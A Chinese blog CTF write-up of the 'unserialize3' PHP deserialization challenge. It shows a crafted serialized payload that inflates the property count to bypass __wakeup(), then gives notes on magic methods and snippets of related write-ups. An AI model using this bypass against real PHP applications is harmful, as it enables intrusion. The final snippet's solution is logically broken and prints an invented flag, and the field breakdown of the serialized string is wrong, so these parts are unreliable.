攻防世界-web-高手进阶区-unserialize3

最新推荐文章于 2025-02-01 17:12:37 发布
最新推荐文章于 2025-02-01 17:12:37 发布
阅读量980 收藏 2
点赞数 1
分类专栏: CTF之Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/95320000
版权

题目

[外链图片转存失败(img-py9MNUTH-1562730330323)(E:\CTF\小白学习总结\攻防世界\web\picture2\6.ti.PNG)]

writeup

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}

分析上述代码,发现:_wakeup()

考虑反序列化

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
echo serialize($a);
?>

得到:

[外链图片转存失败(img-yCcDw5cW-1562730330325)(E:\CTF\小白学习总结\攻防世界\web\picture2\6.1.PNG)]

即:

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

又因为_wakeup(),要求被序列化的对象属性个数要大于原来的1

则构造:

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

得到flag

[外链图片转存失败(img-MRU3NvEs-1562730330327)(E:\CTF\小白学习总结\攻防世界\web\picture2\6.flag.PNG)]

知识点

1、unserialize()与serialize()

<?php
class a{
public $flag = '111';
}
$b = new a();
echo serialize($b);
?>

[外链图片转存失败(img-2G6s4Jh1-1562730330328)(E:\CTF\小白学习总结\攻防世界\web\picture2\k6.1.PNG)]

结果是:

O:1:"a":1:{s:4:"flag";s:3:"111";}

[外链图片转存失败(img-PRKPbSjb-1562730330329)(E:\CTF\小白学习总结\攻防世界\web\picture2\k6.2.png)]

即:

上述结果可分析为:

序列对象:o - object
被序列化的类的名称的长度: 1
被序列化的类的名称:"a"
被序列化的对象的属性个数:1
属性名:s
属性值:4

2、_sleep()_wakeup()

这两个方法是在对象的序列化与反序列化里使用的。

当序列化serialize对象时,可以把对象里的属性和方法转换成连续的bytes数据,保存在一个文件里或者在网络上传输;

当需要使用这个对象时,就可以反序列化unserialize这个字符串,得到这个对象,然后继续使用。

当对一个对象序列化时,php就会调用_sleep()方法(如果存在的话);

在反序列化时,php就会调用_wakeup()方法(如果存在的话)。

_sleep()这个方法可以用于清理对象,并返回一个包含对象中所有变量名称的数组。如果该方法不返回任何内容,则NULL被序列化,导致一个E_NOTICE错误。

在反序列化unserialize时,会检查是否存在_wakeup()方法,如果存在,则会调用_wakeup()方法,预先准备对象数据。

_sleep() 方法常用于提交未提交的数据,或类似的清理操作。同时,如果有一些很大的对象,但不需要全部保存,这个功能就很好用。

_wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。

为了绕过_wakeup(),我们会将序列化的对象的属性个数的值加大,超过规定数来进行绕过。

3、魔术方法

PHP中以两个下划线开头的方法,_construct(), _destruct (), _call(),_callStatic(),_get(),_set(),_isset(), _unset (), _sleep(), _wakeup(), _toString(), _set_state(), _clone(),_autoload()等,被称为"魔术方法"(Magic methods)。这些方法在一定条件下有特殊的功能.

与序列化和反序列化的魔术方法主要是:

_construct()	//当一个对象创建时被调用
_destruct() 	//对象被销毁时触发
_wakeup() 	    //使用unserialize时触发
_sleep() 	    //使用serialize时触发
_toString() 	//把类当做字符串时触发
_get()      	//用于从不可访问的属性读取数据
_set()      	//用于将数据写入不可访问的属性
攻防世界WEB——unserialize3
Zeker62的博客
08-23 374
靶场内容 题目:反序列化——说明和反序列化有关 打开靶场:PHP代码——PHP反序列化 solution 这个靶场出来之后,显示出来是一个不完整的PHP代码——括号都没有完全闭合 开始分析: __wakeup()属于魔术方法,通常用于反序列化中。 unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对...
攻防世界-Web进阶-005unserialize3
gyy990526的博客
03-14 2876
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界——web——unserialize3(反序列化)
m0_75007575的博客
04-05 1493
一、序列化 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将对象转化为字节序列的过程 二、反序列 把字节序列恢复为对象的过程称为对象反序列
3.攻防世界Web_php_unserialize
最新发布
2401_86760082的博客
02-01 1094
_wakeup 方法绕过:在 PHP 5.6.25 和 7.0.10 之前的版本中,当序列化字符串中对象属性的个数被故意修改得比实际属性个数大时,__wakeup 方法会被跳过。正则表达式绕过:代码使用 preg_match('/[oc]:\d+:/i', $var) 来检测可能的恶意序列化字符串,但通过将 O:4(表示 Demo 类的序列化标识,O 代表对象,4 是类名长度)替换为 O:+4,可以绕过这个正则表达式的检测。因为修改后的字符串不符合正则表达式的模式,但仍然是有效的序列化字符串格式。
攻防世界-unserialize3
weixin_62608816的博客
07-13 1059
这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数查找资料得知wakeup为魔法函数,在进行unserialize反序列化的时候,首先就要查看有无该函数有的话 就会先执行他:绕过: 通过测试发现可以通过增加对象的属性个数来进行绕过,根据源码编辑php脚本输出序列化字符串: ​ 将对象属性由1变为2得到** 由此可以构造payload 拿到flag:...
攻防世界web进阶unserialize3
gongjingege的博客
07-15 561
打开链接 代码审计,初步判断code传参获取flag,序列化绕过_wakeup()函数得到payload 编写一个xctf类并序列化,运行代码 得到payload :O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} __wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行 所以将1改为比1大的就行,code传参 得到flag 知识点:_wakeup()函数漏洞,反序列化 2020.7.15 公瑾
攻防世界-Web进阶-unserialize3
分享与记录
06-14 666
之前其实就记录过一篇反序列化的。PHP反序列化-(web_php_unserialize)那个反序列化的题目,比这个复杂一些。既然好久没练,而且在攻防世界上看到了这个 unserialize3 的题目,就复习一下反序列化吧。先 new 一个对象,然后将其序列化,代码如下: 序列化的结果如下: 表示序列化的对象中只有一个属性,如果待反序列化的字符串中,属性个数与实际不符合,则 失效。因此,将 改为 绕过 。传参结果如下:......
攻防世界-web高手进阶
zji
04-25 6811
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1193
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1438
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
攻防世界-Web进阶-006Web_php_unserialize
gyy990526的博客
03-14 2082
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
攻防世界unserialize3
m0_73303597的博客
11-06 2210
好难啊
攻防世界unserialize3
m0_74979597的博客
07-12 2670
序列化和反序列化是将数据结构或对象转换为可存储或传输的格式,以便在需要时可以重新创建它们的过程。序列化将数据结构或对象转换为字节流或字符串,而反序列化将字节流或字符串转换回原始数据结构或对象。在计算机科学中,序列化和反序列化是非常重要的概念,因为它们允许我们在不同的应用程序之间共享数据。例如,当我们将数据从一个应用程序发送到另一个应用程序时,我们需要将数据序列化为可传输的格式,然后在另一个应用程序中反序列化它以将其还原为原始数据结构或对象。
攻防世界-web unserialize3
m0_48108919的博客
02-11 764
结尾提示?code= 猜测通过code传入参数 __wakeup()是魔术方法,经常用在反序列化操作中,unserialize()会检查是否存在一个__wakeup()方法。如果存在,则会先调用__wakeup方法,预先准备对象需要的资源。 由题目代码可知只要触发了wakeup()方法就会执行exit()结束程序 根据题目描述这是一道反序列化题,猜测操作查看flag的代码在xctf类中并且隐藏了没显示在前台,我们需要利用反序列化来调用xctf类,同时需要绕过wakeup()方法 P...
攻防世界(WEB)——unserialize3
NanGuai的博客
09-19 644
与大部分面向对象的语言类似,PHP在使用完一个对象后会将其销毁。当下某个页面要使用同一个对象时,为了避免出现找不到该对象的窘况,需要有一种方法能够将对象保存下来。以下是题目中给出的PHP代码,可以看到代码有缺失。此外,代码中还提示了我们有可能需要将已经序列化的参数传递给code变量。执行,需要使反序列失败。因此需要在不更改序列化值格式的前提下对其作出修改,然后传给。因为没有给出描述,但是根据题目可以看出来这道与。我们尝试将它补全并打印出对象的序列化值。这里我们先搞清楚什么是反序列化。
攻防世界WEBunserialize3
qq_54929891的博客
10-09 237
先来记录一下serialize序列化函数和unserialize反序列化函数的知识点
攻防世界-webunserialize3
weixin_73625393的博客
10-27 775
unserialize()反序列化函数会检查是否存在一个_wakeup()方法。//输出被序列化的对象(a)public function __wakeup(){ //定义公有的类的方法_wakeup()题目中的代码目前没有看见序列化函数,因此传递参数需要自己传递已经序列化的参数,题目中已经提示,传参到code。O::“”::{S:…根据代码审计,构造出来序列化序列后,不能给_wakeup()执行,否则会返回bad request。
攻防世界 unserialize3
Jay17的博客
02-24 196
攻防世界 unserialize3
攻防世界WEB(新手模式)3-unserialize3
你好
07-18 826
反序列化漏洞通常发生在未经过滤的用户输入被反序列化的情况下。如果攻击者能够控制反序列化的数据,他们可能会注入恶意对象,触发类中的特定方法或属性,导致意外行为。当序列化字符串中属性个数大于实际属性个数时,不会执行反序列化,从而跳过wakeup()原本:O:4:"xctf":1:{s:4:"flag";s:3:"111";方法在对象反序列化时被调用。这段代码中,当该类对象被反序列化时,将立即调用。包含序列化对象数据,就可能触发反序列化漏洞。,初始值为'111',并且定义了一个。方法被调用,从而终止脚本执行。
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show(&#39;flag&#39;,&#39;0&#39;); $this->data = file_get_contents(&#39;/flag&#39;); } public function __destruct(){ if(preg_match(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,$this->show)){ exit(&#39;hacker!&#39;); } echo $this->show." is ".$this->data; } } if(isset($_GET[&#39;a&#39;])){ $a = unserialize($_GET[&#39;a&#39;]); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的题目,传入参数为 $_GET[&#39;a&#39;],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents(&#39;/flag&#39;),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i,如果匹配到就会输出 &#39;hacker!&#39;。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据题目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,&#39;0&#39;); $this->data = file_get_contents(&#39;/flag&#39;); } public function __destruct(){ if(preg_match(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,$this->show)){ exit(&#39;hacker!&#39;); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|&#39;|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET[&#39;a&#39;] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值